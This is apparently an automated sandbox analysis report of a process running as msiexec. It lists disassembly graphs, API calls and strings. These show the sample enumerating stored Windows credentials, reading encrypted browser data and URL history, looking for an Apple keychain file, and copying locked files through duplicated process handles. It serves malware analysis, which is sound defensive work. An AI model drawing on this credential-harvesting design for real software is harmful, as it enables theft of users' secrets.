445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 70 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->70 71 445b98-445ba0 55->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 144 445849 69->144 247 445c77 70->247 71->70 78 445ba2-445bcf call 4099c6 call 445403 call 445389 71->78 149 44589f 77->149 78->54 94 44568b-4456a4 call 40a9b5 call 4087b3 79->94 111 4456ba-4456c4 80->111 99 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->99 100 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->100 151 4456a9-4456b0 94->151 169 445d67-445d6c 99->169 170 445d71-445d83 call 445093 99->170 194 445e17 100->194 195 445e1e-445e25 100->195 124 4457f9 111->124 125 4456ca-4456d3 call 413cfa call 413d4c 111->125 124->7 177 4456d8-4456f7 call 40b2cc call 413fa6 125->177 141->142 142->23 144->52 146->147 147->28 149->67 151->80 151->94 157->111 158->157 163->164 174 445d05-445d13 164->174 175 445d17 164->175 179 445fa1-445fa9 call 40b6ef 169->179 170->84 174->175 175->63 208 4456fd-445796 memset * 4 call 409c70 * 3 177->208 209 4457ea-4457f7 call 413d29 177->209 179->84 198 445b17-445b27 call 40aebe 184->198 199 445aa3-445ab0 call 40add4 184->199 194->195 200 445e27-445e59 call 40b2cc call 409d1f call 409b98 195->200 201 445e6b-445e7e call 445093 195->201 198->46 199->184 223 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 199->223 242 445e62-445e69 200->242 243 445e5b 200->243 222 445f67-445f99 call 40b2cc call 409d1f call 409b98 201->222 208->209 246 445798-4457ca call 40b2cc call 409d1f call 409b98 208->246 209->10 222->84 254 445f9b 222->254 223->184 242->201 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->209 264 4457cc-4457e5 call 4087b3 246->264 247->54 265 445f4d-445f5a call 40ae51 248->265 254->179 264->209 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->222 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2263259095-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 4290143792-2783969131
                                                              • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 513 40e304-40e316 call 406e8f 511->513 517 40e476-40e483 call 406b53 513->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 513->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f free 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 554 40e3c3-40e3c6 551->554 552->553 555 40e416-40e427 memcpy 553->555 556 40e42a-40e42f 553->556 554->542 555->556 557 40e431-40e442 memcpy 556->557 558 40e445-40e44a 556->558 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                              APIs
                                                              • memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 4234240956-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
